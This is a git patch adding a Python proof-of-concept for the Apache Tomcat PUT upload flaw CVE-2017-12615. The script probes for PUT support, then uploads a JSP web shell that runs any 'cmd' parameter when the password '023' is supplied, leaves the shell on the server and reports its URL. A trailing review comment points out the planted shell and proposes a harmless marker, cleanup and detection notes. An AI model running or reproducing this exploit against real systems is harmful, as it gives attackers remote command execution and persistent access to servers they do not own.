From c78e15fe96a5d110437528e3fad67c4a914b8f81 Mon Sep 17 00:00:00 2001 From: b1ueb0y Date: Thu, 21 Sep 2017 09:54:33 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0CVE-2017-12615=E5=88=A9?= =?UTF-8?q?=E7=94=A8=E8=84=9A=E6=9C=AC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- t/tomcat/1/poc.py | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 t/tomcat/1/poc.py diff --git a/t/tomcat/1/poc.py b/t/tomcat/1/poc.py new file mode 100644 index 0000000..77cdc79 --- /dev/null +++ b/t/tomcat/1/poc.py @@ -0,0 +1,28 @@ +# -*- coding: utf-8 -*- +#author:hackteam.cn +import random +import requests +import sys + + +def exploit(url): + res='' + body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp + +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' + filecontent="""<%out.println("shajiba");}%>""" + headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'} + AllowMethod= requests.options(url,timeout=10,verify=False).headers + if 'PUT' in AllowMethod['Allow']: + filename="test"+str(random.randint(666, 666666))+".jsp/" + url=url+filename + putstatus=requests.put(url,headers=headers,data=body,timeout=10,verify=False) + if putstatus.status_code==201: + res= url[0:-1]#?pwd=023&cmd=id + return res + +if len(sys.argv) < 2: + print("python poc.py http://192.168.1.10:8080/") + sys.exit(1) +else: + TARGET=sys.argv[1] + print 'get shell at-->'+exploit(TARGET)
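Review bot: `exploit()` uploads `body`, a JSP that executes the `cmd` request parameter behind a fixed `pwd` value, and leaves it on the server, while the inert `filecontent` marker defined right after it is never used. A check for CVE-2017-12615 only needs to show that the write succeeded, so the PUT should send the marker, `putstatus=requests.put(url,headers=headers,data=filecontent,timeout=10,verify=False)`, and the uploaded file should be removed before returning (for example a `requests.delete` on the same URL); `filecontent` as written carries an unmatched `}` that would have to be dropped. The file also does not document the condition being tested: a header comment such as `# Succeeds only when the DefaultServlet init-param "readonly" is false; a PUT to a path ending in ".jsp/" answered with 201 is the access-log pattern to alert on` would tell an operator what to fix and what to look for. Both requests pass `verify=False`, so the server certificate is never validated.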